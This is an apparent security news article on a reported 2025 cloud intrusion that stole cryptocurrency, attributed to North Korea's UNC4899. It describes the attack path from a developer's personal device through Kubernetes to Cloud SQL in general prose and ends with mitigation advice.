![\"\"](\"https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu3lqP8aiEKLJA-l7TChGGULVqWhyphenhyphenMc67vwAHHEK4LkpR5ZlZuFIYWFmmPqdA8VQpGbFPvjwGvDHxkhXmC9xhTWlRCccD9PyU3A08-ahTc87j__u6g7RvgkwNo85LmbffhVRly_r4Sd9iiVdEvjtVvpcw0NiwOM1NfjNFQXx5xquwbd9E1zUUr09SYv_-A/s1600/crypto.jpg\")
The sophisticated cloud compromise campaign targeting a cryptocurrency organization in 2025, believed to be orchestrated by the North Korean threat actor UNC4899, resulted in the theft of millions of dollars in cryptocurrency.
Attributed to a state-sponsored adversary known by various cryptonyms including Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor, the incident involved a combination of social engineering tactics, exploitation of personal-to-corporate device peer-to-peer data transfer mechanisms, and the utilization of cloud-based techniques.
Google’s H1 2026 Cloud Threat Horizons Report highlighted the attack’s progression from compromising a developer’s personal device to executing unauthorized modifications in the cloud environment using DevOps workflows.
The attackers leveraged legitimate DevOps workflows within the cloud environment to harvest credentials, escape container restrictions, and manipulate Cloud SQL databases to facilitate the theft of cryptocurrency.
The attack chain initiated with the compromise of the developer’s personal device and progressed to the manipulation of the corporate workstation before moving to the cloud for unauthorized financial logic alterations.
The perpetrators utilized social engineering tactics to deceive the developer into downloading a malicious archive file, which was then transferred to the company device, leading to the execution of embedded malicious code.
By exploiting vulnerabilities in the victim’s corporate machine, the threat actors gained access to the Google Cloud environment, enabling them to conduct reconnaissance activities and gather sensitive information.
![\"\"](\"https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZO4D4LxxDvQpbsrbs0jqDTmLq0AV9bswK4cf-m70PGtHV-jMrxx7nzGAh4ut7SHVOlJ5jkLsEU5zip6M9Xl_8InIcBbCxWxUVaeVLqtijwt4xETyHti-WfqEfmwNO3Qf7rqBlNq9C-db1BmEwUfwXgpqjWRwN9wy9gLyUrBd-mi8SUVRDPePyPqRPwWai/s1600/g1.jpg\")
The attack evolved with the identification of a bastion host that was manipulated to facilitate additional reconnaissance and access specific pods within the Kubernetes environment.
Subsequently, UNC4899 adopted living-off-the-cloud tactics to establish persistence by modifying Kubernetes deployment configurations to automatically execute malicious commands when new pods were created.
Other steps taken by the threat actor included modifying Kubernetes resources, exploiting service account tokens, escalating privileges, conducting lateral movement, and ultimately gaining access to sensitive infrastructure pods for data extraction and unauthorized database access.
The incident underscores the risks associated with personal-to-corporate P2P data transfers, privileged container modes, and insecure handling of secrets in cloud environments, emphasizing the need for organizations to implement robust security measures.
To mitigate such threats, organizations are advised to implement context-aware access controls, phishing-resistant MFA, secure image deployment practices, isolation of compromised nodes, monitoring of container processes, robust secrets management, and policies restricting peer-to-peer file sharing and external media usage.
